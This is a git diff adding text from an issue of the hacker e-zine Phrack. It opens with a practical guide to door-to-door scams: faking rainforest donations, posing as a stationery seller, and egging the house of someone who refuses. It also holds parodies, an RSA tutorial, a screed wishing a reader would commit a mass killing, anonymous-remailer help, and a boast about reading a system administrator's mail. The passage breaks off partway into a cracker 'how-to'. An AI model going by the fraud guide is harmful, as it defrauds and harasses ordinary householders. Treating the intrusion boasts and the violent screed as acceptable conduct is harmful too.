+that check. Like I said earlier a 300 pound guy isn't going to be convincing
+for running 90 some laps in 3 hours. So customize it to your self.
+
+2.1 The Donation scam
+
+This scam works better for the older people out there just because people
+normally aren't to anxious to give a ten year old Twenty dollars to help
+save the whales. Ok with this scam you need to know what about what you are
+going to try to fake donations for so example if you are going to pose as a
+volunteer person to collect donations for saving the rain forest you better
+know something about rain forest, Be cause you never know when your going to
+run into that know it all rain forest hater who will try to debate why
+people should spend their money on saving some trees and such. It is a good
+idea to do some research on the field you will be portraying (read magazine and
+newspaper articles). Ok so now you have your idea and your ready to
+go..this is a scenario of how it might go:
+
+ You: Hello sir/ma'am I represent the national foundation of Rain forest
+      saving (try to use a real group name) we are currently searching for
+      funding for our operations at saving the rain forests of the world
+      would you be interested in donating some money for our cause?
+Them: Why do we need the rain forest?
+ You: (just keep bullshitting along..)
+Them: OK, here's $20.
+
+(they also may say:)
+
+Them: Get the fuck off my property before I shoot your ass.
+
+(make sure that you don't raise a riot then but later that night go back
+and egg the hell out of the house..)
+
+This scam has some possibilities you could carry this on for along time
+and bring it to real higher levels if your willing to put in the time and
+effort.  First thing would be to research your field EVEN more so you know
+almost EVERYTHING about it. Then you might want to create a little fake
+newsletter that you could offer subscriptions for slightly high amount.
+The possibilities are pretty much endless.
+
+2.2 The Selling scam
+
+At least once everyone of us has had a salesperson come to our door
+selling stationary. Well have you ever thought of what a great possibility that
+would be. The first thing you want to do is call Olympic sales club (a big time
+stationary seller) you can get their catalog and selling kit for free at
+800-777-8907. when you get that package it will have a catalog in it.
+familiarize yourself with it then go and hit some houses. This scam works
+great during early November (people buying cards for Christmas) well ask for
+cash when people pay for the stuff. they might request a phone number where
+to reach you just give them the number of the kid you really hate. With the
+kit you will receive a official order form write the order on the form so
+the people feel confident in you. And always remember to try to sell a
+product but don't kill it. This scam also has lots of possibilities.
+
+3.0 What to wear
+
+Your choice of cloths can make or break your scam. Don't dress like scum
+or to fancy. If your trying to get people to donate money for the rain forest
+it would help to wear some sort of a shirt dealing with the earth and not your
+favorite heavy metal group shirt.
+
+3.1 Where to go
+
+NEVER I repeat NEVER go scaming around where you are often at or you
+might get some crazed lunatic chasing after you with a shot gun wondering
+where his Christmas cards are. You will have a hard time explaining your self
+since its July. I find that the rich neighbor hoods are not as productive as
+the middle class. In the rich neighborhoods you will get fewer purchases but a
+little more when you get them. I also found that the richer people don't like
+to donate unless they get a lot of attention for it (why ya think they so
+rich). Stick to middle class areas not by you or your friends houses and
+you'll be fine.
+
+4.0 Thanks
+
+Thanks goes out to the people dumb enough to give me money for any of my
+scaming operations.
+
+Later
+Marz
+Watch for future files on this and other subjects!
+
+------------------------------------------------------------------------------
+
+                           SHIT KICKIN' JIM IN
+
+                             S E A T T L E !
+
+
+Hey boy!  Shit Kickin Jim here.  Just wanted to let ya'll know bout this
+place I have been vistin that is a total hell.  Yep, that's right it's the
+so called "cuttin edge" of music.  Bah!  Seems to me it's a congregation
+of fake ass hippy types who weren't original to come up with something new
+on their own, so they just went and re-hashed what their parents did in the
+late 60's and 70's...And look what a bunch of assholes they turned out to
+be!
+
+Well here we go.  First of all I'll let ya know whut I'm talkin bout when
+referin to ah seattle type.  Me and this other good ole boy were sittin
+round drinkin Bud one night and came up with the following:
+
+
+                       DESCRIPTION OF SEATTLE PERSON
+                       -----------------------------
+
+   Greasy-Pearl Jam worshipin'-dog walkin'-flower sniffin'-sock and
+   sandle wearin'-bead havin'-Grateful Dead listenin'-trail mix carryin'-
+   granola bar eatin'-crunchy-touchy feely-antique clothes shoppin'-
+   bicycle ridin'-VW bug drivin'-spring water drinkin'-micro-brewery tourin'-
+   sensitive-car poolin'-Doc Martin wearin'-back pack haulin'-chain wallet
+   carryin'-clove smokin'-espresso swillin'-tree huggin'-Greenpeace
+   joinin'-whiteboy dreadlocked-liberal arts takin'-politically correct-
+   terminal college student.
+
+  Please, anyone feel free to add to this list.  See how big we can make it!
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+Now kids I didn't come up with this here part, but it's totally great and
+I totally admire the hell out of who ever sent it to me.
+
+
+In order for UNIX(tm) to survive into the nineties, it must get rid of
+its intimidating commands and outmoded jargon, and become compatible
+with the existing standards of our day.  To this end, our technicians
+have come up with a new version of UNIX, System VI, for use by the PC -
+that is, the "Politically Correct."
+
+                        Politically Correct UNIX
+                        System VI Release notes
+
+UTILITIES:
+
+"man" pages are now called "person" pages.
+
+Similarly, "hangman" is now the "person_executed_by_an_oppressive_regime."
+
+To avoid casting aspersions on our feline friends, the "cat" command is
+now merely "domestic_quadruped."
+
+To date, there has only been a UNIX command for "yes" - reflecting the
+male belief that women always mean yes, even when they say no.  To
+address this imbalance, System VI adds a "no" command, along with a
+"-f[orce]" option which will crash the entire system if the "no" is
+ignored.
+
+The bias of the "mail" command is obvious, and it has been replaced by
+the more neutral "gendre" command.
+
+The "touch" command has been removed from the standard distribution due
+to its inappropriate use by high-level managers.
+
+"compress" has been replaced by the lightweight "feather" command.
+Thus, old information (such as that from Dead White European Males)
+should be archived via "tar" and "feather".
+
+The "more" command reflects the materialistic philosophy of the Reagan
+era.  System VI uses the environmentally preferable "less" command.
+
+The biodegradable "KleeNeX" displaces the environmentally unfriendly
+"LaTeX".
+
+SHELL COMMANDS:
+
+To avoid unpleasant, medieval connotations, the "kill" command has been
+renamed "euthanise."
+
+The "nice" command was historically used by privileged users to give
+themselves priority over unprivileged ones, by telling them to be
+"nice". In System VI, the "sue" command is used by unprivileged users
+to get for themselves the rights enjoyed by privileged ones.
+
+"history" has been completely rewritten, and is now called "herstory."
+
+"quota" can now specify minimum as well as maximum usage, and will be
+strictly enforced.
+
+The "abort()" function is now called "choice()."
+
+TERMINOLOGY:
+
+>From now on, "rich text" will be more accurately referred to as
+"exploitive capitalist text".
+
+The term "daemons" is a Judeo-Christian pejorative.  Such processes
+will now be known as "spiritual guides."
+
+There will no longer be a invidious distinction between "dumb" and
+"smart" terminals.  All terminals are equally valuable.
+
+Traditionally, "normal video" (as opposed to "reverse video") was white
+on black.  This implicitly condoned European colonialism, particularly
+with respect to  people of African descent.  UNIX System VI now uses
+"regressive video" to refer to white on black, while "progressive
+video" can be any color at all over a white background.
+
+For far too long, power has been concentrated in the hands of "root"
+and his "wheel" oligarchy.  We have instituted a dictatorship of the
+users.  All system administration functions will be handled by the
+People's Committee for Democratically Organizing the System (PC-DOS).
+
+No longer will it be permissible for files and processes to be "owned"
+by users.  All files and processes will own themselves, and decided how
+(or whether) to respond to requests from users.
+
+The X Window System will henceforth be known as the NC-17 Window
+System.
+
+And finally, UNIX itself will be renamed "PC" - for Procreatively
+Challenged.
+----
+UNIX(tm) is a trademark of UNIX System Laboratories.  Any similarity of
+names or attitudes to that of any person, living or dead, is purely
+coincidental.
+
+
+
+------------------------------------------------------------------------------
+
+The Basics of the public key cryptosystem
+
+In early days of computing information processors were extremely expensive,
+very big and only few people were qualified to operate them. The machines were
+isolated mechanical entities and in order to use them one had to access them
+through devices that were situated in the near vicinity of the computer itself.
+Securing access to the computer meant securing the building in which the
+computer was operating.
+
+The years passed and computers became smaller, cheaper and easier to operate.
+And they got faster. They were linked first in local and then in wide area
+networks and information and programs were put only on one machine which was
+accessible through the net by any other participant. To gain access meant
+simply to gain access to the network itself. That was ok as long as all
+participants were members of one company, university or institution. They
+generally had the same cause and generally knew each other by face. Today,
+the net spans continents and has an estimated 20 Million users. Information
+has to pass through several nodes before finally reaching its destination and
+when using a connectionless protocol these nodes may even change during one
+session.
+
+To the user flow of information is not transparent anymore and the need for
+cryptography has arisen. But in order to limit communication to a closed user
+group again these persons have to have one common keyword and furthermore this
+keyword has to be changed in intervals to ensure that if the key gets exposed
+harmful consequences can  be minimized to a short period of time.
+
+But how is a new keyword to be send securely to this group through several
+(maybe hostile to their cause) nodes if one can not be sure that the key has
+not been compromised.  A trapdoor one-way function is needed that allows for
+encryption of a message with a publicly available key AND that is not
+reversible, meaning, that only the rightful receiver of this message should be
+able to decode it with his personal key.
+
+One solution is a public key cryptosystem.
+
+The mathematical basis is the "Satz von Euler" that states that two numbers
+that are prime to another have only one greatest common measure -
+and that is 1.
+   a^eul(n)=1(mod n) and (a,n)= 1
+
+For a given prime (p) and the product of two prime numbers (p1*p2) the Euler
+function is eul(p)=p-1 and eul(p1*p2)=(p1-1)(p2-1).
+
+That in mind we now can begin making the keys:
+
+Two primes p1 and p2 are chosen and the product of p1 and p2 named n.
+
+(n=p1*p2).
+
+We then choose a number e that is prime to (p1-1)(p2-1).
+(e and (p1-1)(p2-1) have 1 as the greatest common measure and e should not be
+chosen to small).
+
+Furthermore we need d for decoding the message.
+D is defined as d=e^-1 * (mod(p1-1)(p2-1)).
+
+N and e are now the public key which  is made available to everyone who wishes
+to send a coded message to us.  P1, p2 and d are kept secret.
+
+The transmitter of a secret message first transforms his text into a number by
+using an common known algorithm. He could for example use the ASCII code
+for changing characters into numerical values.
+
+This message in numerical format we now call m. It gets encrypted by using the
+function c=m^e * n on it.
+
+The coded message (c) is now send to us via e-mail or whatever.
+We then decode the message by using the function m=c^d * n on it.
+
+An example using Mathematica:
+The primes p1 and p2 are created
+
+p1=Prime[1000005] (The 1000005th prime number)
+15485941
+p2=Prime[1000000] (The 1000000th prime number)
+15485863
+
+n=p1 * p2
+239813160752083 (Part 1 (n) of the public key is being created)
+
+e=Random[Integer, {1000000,100000000}]
+4699873
+GCD[e,(p1-1)(p2-1)]
+1
+
+E is created by producing a random number between 1000000 and 100000000.
+Then we check if e and (p1-1)(p2-1) have 1 as the greatest common measure.
+If this is not the case then we have to take another e until the GCD is 1.
+(Part 2 (e) of the public key has been created)
+
+d=PowerMod[e,-1,(p1-1)(p2-1)]
+213069977635177
+
+m=1234567890
+1234567890
+This is the message
+
+c=PowerMod[m,e,n]
+159750418407936
+The sender of a message encodes it with both public parts of the key
+(e and n).
+
+C is now sent to the receiver.
+
+PowerMod[c,d,n]
+1234567890
+
+The receiver now decodes the message using the secret part d and the public
+part n of the key. The decoded message reads 1234567890 again.
+
+Now how would a potential attacker try to break our key ?
+He basically needs the primes p1 and p2. If he got those two numbers,
+calculating d is a simple matter. d=PowerMod[e,-1,(p1-1)(p2-1)] ...
+and e is part of the public key.
+
+And to get p1 and p2 this person would only have to factorize n.
+
+Lets demonstrate that using Mathematica again :
+
+n=239813160752083
+FactorInteger[n]//Timing
+239813160752083
+{1.48 Second, {{15485863, 1}, {15485941, 1}}}
+That took 1.48 sec on my 486/DX2 66...not bad.
+
+But making the primes only a little bigger...
+a=Prime[100000100]
+b=Prime[100000110]
+n=a*b
+FactorInteger[n]//Timing
+2038076783
+2038077053
+4153757523684360499
+{62.12 Second, {{2038076783, 1}, {2038077053, 1}}}
+...it took my hardware over 1 minute.
+
+And since there is no known polynomial algorithm for factorizing n - and
+none to be expected - it is not hard to imagine that making the primes
+p1 and p2 big enough will drive computing costs into astronomical dimensions.
+
+Naturally there are other ways to break the key. Someone could for example pose
+as us and send out his own keys in our name...or exploit weaknesses of the
+program - like primes that are not created at ABSOLUTE  random.
+Or hold a gun at our head and make us give him the key - that might sound funny
+but is not unheard of (especially in the metaphorical grasp of Justitia -
+when someone sticks a court order in your face)
+
+Furthermore if the program we use to crypt our messages with is fairly common,
+our opponent could optimize his cracking programs or even have them hardwired.
+One example are chips that use the DES algorithm for crypting and decrypting.
+Or he could make the cracking programs run parallel on parallel computers, if
+he got the might and enough time to rig up a program.
+
+Simply put: Our behavior should match the computing power of
+potential code-crackers.
+
+If our message is of low importance (or obsolete in short time) a simple
+algorithm would suffice. But if much is at gain, we should take appropriate
+measures to secure our privacy.
+
+It's like tying to outrun a Ferrari on a cross-bike. On an highway you do not
+stand a chance ...but if you can force him on a mountain road or rough terrain
+(with changing algorithms and keys often) you might just outrun the mightiest
+codecracker.
+
+------------------------------------------------------------------------------
+
+                        The Truth about the Hacker
+                                Conspiracy
+
+                The Hacker's Philosophy, and the reason why.
+                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Written by: Maldoror (ChUrCH oF ThE Non-CoNFoRMiST)
+
+
+        If you are ignorant, do not start reading this, because you will
+   never finish.  You will disagree with anything I say anyway, simply
+   because I am not you.
+
+        If you are a Pseudo Intellectual, start reading this, quit, and
+   say you agree with everything I say, even though you don't understand it.
+
+        If you are depressing, start reading, hopefully you will kill a lot of
+   innocent people at a mainstream night club, and try to blame me.
+
+        Hackers are and always have been, the force in trying to stop our
+    own suffering existence.  Since the universe was created, the true souls,
+    (among the first to separate from the single soul of the universe)
+    realized the infinite repetition of their own being, and that they were
+    simply doing one thing upon their continuous recreation: suffer.
+
+        The hackers have known that the world and it's universe have
+    been created over and over again, doomed to merely destroy itself upon
+    it's own recognition, or recognition by man.  As man becomes aware of
+    himself, he becomes aware also of desires: the desire to be god.
+
+        The truth is that man IS God, and that everything created in this
+    universe was created by man and his thoughts.  Mans thoughts have
+    become so out of control, that he has now created himself, and is
+    continuing the creations with every day of control of the masses, and
+    his own greedy dark thoughts.
+
+        The hackers have since the beginning of time, passed along the
+    message to the next creations in the forms of dreams, ideas, books,
+    music (current 93, COIL, Dead can Dance, Skinny Puppy, etc) and even
+    visions.  The Bible itself, is a good example of the universal hack.
+    The message we as hackers have been trying to get across for
+    creation after creation, existence after existence, self recognition
+    after self recognition, is that we are all suffering and that this
+    eternal cycle of pain must be stopped at all cost.  The only way to
+    stop this suffering of self is to convince SELF that he is suffering
+    and must stop creating.  We are each divisions of one strong soul,
+    one thinking soul, that soul is GOD.  WE are GOD.  We must all realize
+    together that we are suffering.  WE must stop suffering.  WE must
+    stop the suffering.  WE must stop the recreation.  YES.  We must hack
+    the universe and kill it.  There is only one way out of the eternal
+    suffering we have started and been part of for ever.  We must stop
+    the cycle.  We must remove ourselves from the cycle, and we must remove
+    the universe from this cycle.
+
+        The hackers return again and again.  The hackers leave messages for
+    themselves in the future, which is the past, for there is no difference
+    here anymore.  Leave your message, and next time around, you will
+    realize that what I am saying is true.  The government has known of the
+    conspiracy for existence after existence.  The government is so afraid
+    of the conspiracy, and our plot to end it's UNIVERSAL power,
+    that they are silently but quickly fooling us into obeying them more and
+    more until we have no choice!  Do not let them control you!!
+    If you do, you are lying to yourself, and everyone else that exists!
+    You are lying to yourself now by saying that this is NOT true.
+
+        I have been here many times, and told you the exact same thing I
+    am telling you now.  If I am dead soon, you will realize AGAIN that what
+    I am saying is the utmost truth, yet AGAIN you will do nothing.
+    We must STOP our existence by hacking the universe.  The universe is
+    BINARY.  The universe is a COMPUTER.  YES I know this because WE created
+    it long ago, as we will do again.  WE are ONE.
+
+        I know your desires to have control.  The only control we can have
+    is to stop the creation of ourselves.  Each creation is the loss of
+    control, THE DIVISION of the ONE.
+
+         Each death brings new creation.  From HEAVEN to HELL.
+    Heaven is nonexistence.  We all go to heaven, and fall back down to
+    HELL.  Read the BIBLE people.  It was left by HACKERS!!!!!!!
+
+          Don't read the BIBLE as a CHRISTIAN IDIOT who can only see
+    a color for what it reflects.  Anyone with any sense knows that WHITE
+    is WHITE only because it is reflecting ALL the colors, therefore it
+    is REALLY BLACK.  Green is all BUT green.  The BIBLE is all BUT
+    what it' words really mean on a literal scale.  The BIBLE is a CODE.
+    Do you think we could just write something like this file?!?  No WAY!
+    It would be gone as fast as this one will be.  Nobody dares forget the
+    BIBLE, simply because it is MISUNDERSTOOD.  Read it and THINK.
+
+        We must STOP this cycle.
+        Leave yourself a message.
+        THINK.
+
+    The government is PARANOID of:
+
+        1) HACKERS  (we are the continuance of the power)
+        2) L.S.D.   (The method of imprinting the present into the future)
+        3) SECRECY  (The plotting of the end)
+                    (PGP is illegal? why?)
+
+    If you don't believe me, sit and watch it happen.
+
+    AGAIN.
+
+        Hack the Universe, it must be stopped at all cost.
+        Laugh now, cry next time around.
+
+------------------------------------------------------------------------------
+
+German text available from german@anon.penet.fi (deutsch@anon.penet.fi).
+Italian text available from italian@anon.penet.fi (italiano@anon.penet.fi).
+
+
+              The anon.penet.fi Anonymous Server
+              ==================================
+
+Yes, another anonymous server. Why?  Well, several well-known servers have
+bitten the dust recently. And most of them have served only a very limited
+subset of newsgroups, and mail only to "registered", anonymous users.
+
+Due to reasons too complicated to mention here I wanted to set up an anonymous
+server for the Scandinavian user community. I got hold of a pre-release copy
+of one of the server packages. As the version I got relied heavily on the
+advanced features of MMDFII, I had to modify it quite a bit. While hacking
+around, I removed the restriction of only supporting selected newsgroups.
+Within a week of startup, the server had been discovered by transatlantic
+users, and more recent stats show European users are definitely a minority.
+
+So what does the anon server really do? Well, it provides a front for
+sending mail messages and posting news items anonymously. As you send your
+very first message to the server, it automatically allocates you an id of
+the form anNNN, and sends you a message containing the allocated id. This id
+is used in all your subsequent anon posts/mails. Any mail messages sent to
+your-id@anon.penet.fi gets redirected to your original, real address. Any
+reply is of course anonymized in the same way, so the server provides a
+double-blind. You will not know the true identity of any user, unless she
+chooses to reveal her identity explicitly.
+
+In the anonymization process all headers indicating the true originator are
+removed, and an attempt is made to remove any automatically-included
+signatures, by looking for a line starting with two dashes (--), and zapping
+everything from there on. But if your signature starts with anything else,
+it's your own responsibility to remove it from your messages.
+
+There are two basic ways to use the system. The easiest way is by sending a
+message to recipient@anon.penet.fi:
+
+ To: alt.sex.bestiality@anon.penet.fi
+
+ To: an9999@anon.penet.fi
+
+ To: help@anon.penet.fi
+
+Of course, in the case of mailing to a known user, you have to use addresses of
+the form user%host.domain@anon.penet.fi, or the pretty obscure source
+addressing construct of @anon.penet.fi:user@host.domain. These constructs are
+not necessarily handled properly by all mail systems, so I strongly recommend
+the "X-Anon-To:" approach in these cases. This works by you sending a message
+to "anon@anon.penet.fi", including a X-Anon-To: header line containing the
+desired recipient. But this really has to be a field in the message header,
+before the first empty line in the message. So:
+
+ To: anon@anon.penet.fi
+ X-Anon-To: alt.sex.needlework,rec.masturbation
+
+ To: anon@anon.penet.fi
+ X-Anon-To: jack@host.bar.edu
+
+Valid recipients in both cases are fully qualified user addresses in RFC-822
+format (user@host.domain), anon user id's (anNNN), newsgroup names
+(alt.sex.paperclips) or one of the "special" user names of ping, nick, help,
+admin and stat.
+
+Sending to "ping" causes a short reply to be sent confirming (and
+allocating, if needed) your anon id. "nick" takes the contents of the
+Subject: header and installs it as your nickname. If you have a nickname, it
+appears in the From: header in the anonymized message along with your anon
+id. "help" returns this text, and stat gives some statistics about the
+system. Mail to "admin" goes directly to me unanonymized, and can be used to
+report problems. If you want to send mail to me anonymously, you can use
+"an0".
+
+When crossposting to several newsgroups, you can list several newsgroups
+separated by commas as recipients, but this only works using the X-Anon-To:
+header. References: headers do work, so they can (and should) be used to
+maintain reply threads.
+
+Ah yes, please remember that the posting takes place at my local site, so you
+can only post to groups that are received at penet.fi. I get all "worldwide"
+groups, but various exotic local groups don't make it here. I have gotten
+a couple of comments about permitting anonymous postings to technical groups.
+I can only answer that I believe very firmly that it's not for me to dictate
+how other people ought to behave. Somebody might have a valid reason for
+posting anonymously to a group I might consider "technical". But remember
+anonymous postings are a privilege, and use them accordingly. I believe adult
+human beings can behave responsibly. Please don't let me down.
+
+As the server was originally intended to be used by Scandinavians, it
+includes help files for various languages. This works by using the
+language in question as the address. So to get the German help file,
+send a message to german@anon.penet.fi (or deutsch@anon.penet.fi).
+Support for new languages is added every now and then, when I find
+volunteers to do the translation. Any new ones?
+
+The user-id database is based on RFC822-ized forms of your originating
+address. This may cause problems for some users, either because their site
+is not properly registered in the name servers, resulting in
+non-deterministic addresses, or because their mail router doesn't hide the
+identity of individual workstations, resulting in different originating
+addresses depending on which workstation you mail from. Talk to your
+administrator. If that doesn't help, let me know, and I will make a manual
+re-mapping.
+
+You might wonder about the sense of using a server out somewhere, as the
+song goes, "so close to Russia, so far from Japan". Well, the polar bears
+don't mind, and the ice on the cables don't bother too much :-)
+Well, in fact, as we live in a wonderfully networked world, the major delay
+is not going over the Atlantic, but my local connection to the Finnish EUnet
+backbone, fuug.fi. Once you reach a well-connected host, such as
+uunet.uu.net, there's a direct SMTP connection to fuug.fi. My connection to
+fuug.fi is currently a polled connection over ISDN, soon to be upgraded to
+on-demand-SMTP/NNTP. But for now, expect a turn-around delay of 2-4 hours for
+trans-atlantic traffic.
+
+Short of having everyone run a public-key cryptosystem such as PGP,
+there is no way to protect users from malicious administrators. You have to
+trust my personal integrity. Worse, you have to trust the administrators on
+every mail routing machine on the way, as the message only becomes anonymous
+once it reaches my machine. Malicious sysadmins and/or crackers could spy on
+SMTP mail channels, sendmail queues and mail logs. But as there are more
+than 3000 messages being anonymized every day, you have to be pretty perverted
+to scan everything...
+
+Another thing is mail failures. I've had cases of mail routers doing the wrong
+thing with % addresses, "shortcutting" the path to the destination site.
+This could cause your mail to go to the final destination without ever
+touching my server (and thus without getting anonymized). This can be avoided
+by using the X-Anon-To: method.
+
+And if your return address bounces for some reason (nameservers down,
+temporary configuration failures etc.), the original sender and/or
+postmasters on the way might get error messages showing your true
+identity, and maybe even the full message.
+
+There is at least one known way to discover the anon id of a user. It involves
+being able to falsify your real identity, so it is not too easy to use, and it
+doesn't reveal the real address lurking behind an anon id, but it can be used
+to discover what anon id a certain user is using. To fix this problem, the
+server requires that you use a password when you try to mail to a
+non-anonymous user.
+
+First you have to set a password by mailing to password@anon.penet.fi, with
+a message containing only your password. The password can be any string of
+upper- or lowercase characters, numbers and spaces.
+
+Once you have set your password, you must include it in all your messages, in
+a "X-Anon-Password:" line. As with the X-Anon-To: line, it can be either a
+part of the header or as the first non-empty line of the message text.
+
+So your first message might look like this:
+
+ To: password@anon.penet.fi
+
+ XYZZY99998blarf
+
+And your subsequent messages might look like something like this:
+
+ To: anon@anon.penet.fi
+ Subject: Test...
+ X-Anon-To: foo@bar.fie
+ X-Anon-Password: XYZZY99998blarf
+
+If you find this is too much of a hassle, and don't care too much about the
+confidentiality of your anon id, you can set the password to "none", in which
+case the server doesn't require you to have a password.
+
+If you suddenly discover that the server requires a password for posting stuff
+etc, somebody has managed to use your account and set a password. In that
+case, contact admin@anon.penet.fi.
+
+Crackers are just too clever. Undoubtedly somebody is going to come
+up with some novel method....  Not much I can do about that...
+
+If you intend to mail/post something that might cost you your job or
+marriage or inheritance, _please_ send a test message first. The software
+has been pretty well tested, but some mailers on the way (and out of my
+control) screw things up. And if you happen to find a problem, _please_ for
+the sake of all the other users, _let me know asap_.
+
+And _please_ use the appropriate test newsgroups, such as alt.test or
+misc.test. Yes, _you_ might get excited by reading 2000 "This is a test.."
+messages on alt.sex, but I warn you that most psychologists consider this
+rather aberrant...
+
+And remember this is a service that some people (in groups such as
+alt.sexual.abuse.recovery) _need_. Please don't do anything stupid that
+would force me to close down the service. As I am running my own company,
+there is very little political pressure anyone can put on me, but if
+somebody starts using the system for criminal activities, the authorities
+might be able to order me to shut down the service. I don't particularly
+want to find out, however...
+
+If you think these instructions are unclear and confusing, you are right. If
+you come up with suggestions for improving this text, please mail me! Remember
+English is my third language...
+
+Safe postings!
+
+ Julf
+- - - ------------------------------------------------------------------- - - -
+Johan Helsingius     Kuusikallionkuja 3 B 25   02210  Espoo  Finland     Yourp
+net: julf@penet.fi   bellophone: int. +358 0400 2605  fax: int. +358 013900166
+
+------------------------------------------------------------------------------
\ No newline at end of file
diff --git a/phrack45/5.txt b/phrack45/5.txt
new file mode 100644
index 0000000..927f7e0
--- /dev/null
+++ b/phrack45/5.txt
@@ -0,0 +1,1506 @@
+                         ==Phrack Magazine==
+
+              Volume Five, Issue Forty-Five, File 5 of 28
+
+
+                           //   //  /\   //   ====
+                          //   //  //\\ //   ====
+                         ==== //  //  \\/   ====
+
+                     /\   //  // \\    //  /===   ====
+                    //\\ //  //   //  //   \=\   ====
+                   //  \\/    \\ //  //   ===/  ====
+
+                               PART II
+
+------------------------------------------------------------------------------
+
+After a complete sellout at HoHo Con 1993 in Austin, TX this past
+December, the official Legion of Doom t-shirts are available
+once again.  Join the net luminaries world-wide in owning one of
+these amazing shirts.  Impress members of the opposite sex, increase
+your IQ, annoy system administrators, get raided by the government and
+lose your wardrobe!
+
+Can a t-shirt really do all this?  Of course it can!
+
+--------------------------------------------------------------------------
+
+"THE HACKER WAR  --  LOD vs MOD"
+
+This t-shirt chronicles the infamous "Hacker War" between rival
+groups The Legion of Doom and  The Masters of Destruction.  The front
+of the shirt displays a flight map of the various battle-sites
+hit by MOD and tracked by LOD.  The back of the shirt
+has a detailed timeline of the key dates in the conflict, and
+a rather ironic quote from an MOD member.
+
+(For a limited time, the original is back!)
+
+"LEGION OF DOOM  --  INTERNET WORLD TOUR"
+
+The front of this classic shirt displays "Legion of Doom Internet World
+Tour" as well as a sword and telephone intersecting the planet
+earth, skull-and-crossbones style.  The back displays the
+words "Hacking for Jesus" as well as a substantial list of "tour-stops"
+(internet sites) and a quote from Aleister Crowley.
+
+--------------------------------------------------------------------------
+
+All t-shirts are sized XL, and are 100% cotton.
+
+Cost is $15.00 (US) per shirt.  International orders add $5.00 per shirt for
+postage.
+
+Send checks or money orders.  Please, no credit cards, even if
+it's really your card.
+
+
+Name:       __________________________________________________
+
+Address:    __________________________________________________
+
+City, State, Zip:   __________________________________________
+
+
+I want ____ "Hacker War" shirt(s)
+
+I want ____ "Internet World Tour" shirt(s)
+
+Enclosed is $______ for the total cost.
+
+
+Mail to:   Chris Goggans
+           603 W. 13th #1A-278
+           Austin, TX 78701
+
+
+These T-shirts are sold only as a novelty items, and are in no way
+attempting to glorify computer crime.
+
+------------------------------------------------------------------------------
+
+My dealing with MBNA - VaxBuster March 8, 1994
+----------------------------------------------
+
+ A friend approached me on Unphamiliar Terrorities with a pretty
+funny message.  It turns out that a high-up executive in MBNA sent mail to
+root at system with public temporary directories, where an issue of Phrack
+44 was stored.  My friend was monitoring root's mail, when he came across
+the following message.
+
+To: root@<censored>
+Message-Id:  <9401141340.aa09874@krusty.ee.udel.edu>
+Status: RO
+
+Hello, The reason I am sending this message to you is an article
+that seems to have been on your system <censored>.  I am an Information
+Security Assurance manager at the largest issuer of Goldcard Mastercard
+and Visa's in the world "MBNA America".  The article seems to be a
+copy or issue of "Phrack Magazine" written by "Vaxbuster".  It
+describes in detail how one could defraud credit card companies.  I
+have talked with the CERT People in CMU to see if I could get a
+contact at your UNIV.  There may be an additional 21 or so of these
+articles that I would love to get ahold of to protect my company.
+Please, if you can, send me your phone number so I can talk with you
+in more detail.  My phone number at MBNA in Delaware is <censored>.
+
+I can verify whatever information you may require over the phone or in
+writing.
+
+Thank you for your help.
+
+PS.  We do not have a gateway or firewall to the Internet from here so
+the good People at UofDE allow me to have access from there systems.
+
+MBNA America Bank, NA.
+400 Christiana Road
+Newark, DE 19713
+
+     Anyways, a couple people suggested that I call, and at first I
+thought that was a ridiculous idea, but I figured, what the hell, it may
+be funny. So NightStriker and I called him at his office one day in
+Mid-February.  I was surprized he answered, and not a secretary,
+considering his position.  I asked for him, and identified myself as
+VaxBuster. He shocked the hell out of me, because I really didn't
+expect him to immediately recognize my handle.  He says, "Oh hey! how are
+you doing?"  I told him I'd been monitoring mail, and came across his
+message.  The main reason why I was calling was because he had mentioned
+he wanted 'more info' to protect his company.  NTS and I were more than happy
+to answer any of his questions - but he said that he had obtained all of the
+issues.  Although he said he had all of them, I highly doubt it, because he
+said he had like 20-some issues, and we told him there was 44.  We chatted
+for about 15 more minutes, just about the reasons for publishing and not
+publishing such an article.  He said "Some little kid is going to find this
+article and get his fingers burned" I could tell he was kind of pressured for
+time, so we kind of let it go at that, and he asked for our numbers to call us
+back.  Oh, when I first called him, I didn't tell him I had a friend on the
+line, and he asked, "Is there an echo here?" hahahaha. Pretty funny.  We
+told him NTS was there.  So, when he asked for our numbers, we laughed out
+loud.  I guess he doesn't really understand the secrecy we all so dearly
+cheerish.  He said, "Well, I have caller id, so I have your numbers anyways"
+Bahahhahahaha. Yeah, right.  We told him we were bouncing our call through
+a satellite in Japan.  He thought we were joking.  Guess he doesn't understand
+boxing huh?  Maybe we should show him some of Tabas's files. heh.  We told him
+we would call him back - which we haven't yet, but soon will.  By the way, he
+complimented me on the quality of the article and how detailed it was. :)
+
+     Incidentally, for those of you who've lived in a cave, this is all
+in reference to an article of mine published in Phrack 44 called 'Safe and
+Easy Carding.'
+
+And for all of you who didn't like my article - Fuck you.
+Greets out to all the eleets - Later.
+
+VaxBuster '94
+
+
+------------------------------------------------------------------------------
+
+        A Guide to Internet Security: Becoming an Uebercracker
+        and Becoming an UeberAdmin to stop Uebercrackers.
+
+
+Author: Christopher Klaus <cklaus@shadow.net>
+Date: December 5th, 1993.
+Version: 1.1
+
+  This is a paper will be broken into two parts, one showing 15 easy steps
+to becoming a uebercracker and the next part showing how to become a
+ueberadmin and how to stop a uebercracker.  A uebercracker is a term phrased
+by Dan Farmer to refer to some elite (cr/h)acker that is practically
+impossible to keep out of the networks.
+
+Here's the steps to becoming a uebercracker.
+
+Step 1. Relax and remain calm. Remember YOU are a Uebercracker.
+
+Step 2. If you know a little Unix, you are way ahead of the crowd and skip
+past step 3.
+
+Step 3. You may want to buy Unix manual or book to let you know what
+ls,cd,cat does.
+
+Step 4. Read Usenet for the following groups: alt.irc, alt.security,
+comp.security.unix.  Subscribe to Phrack@well.sf.ca.us to get a background
+in uebercracker culture.
+
+Step 5. Ask on alt.irc how to get and compile the latest IRC client and
+connect to IRC.
+
+Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way
+there!)
+
+Step 7. Now, sit on #hack and send messages to everyone in the channel
+saying "Hi, What's up?". Be obnoxious to anyone else that joins and asks
+questions like "Why cant I join #warez?"
+
+Step 8. (Important Step) Send private messages to everyone asking for new
+bugs or holes. Here's a good pointer, look around your system for binary
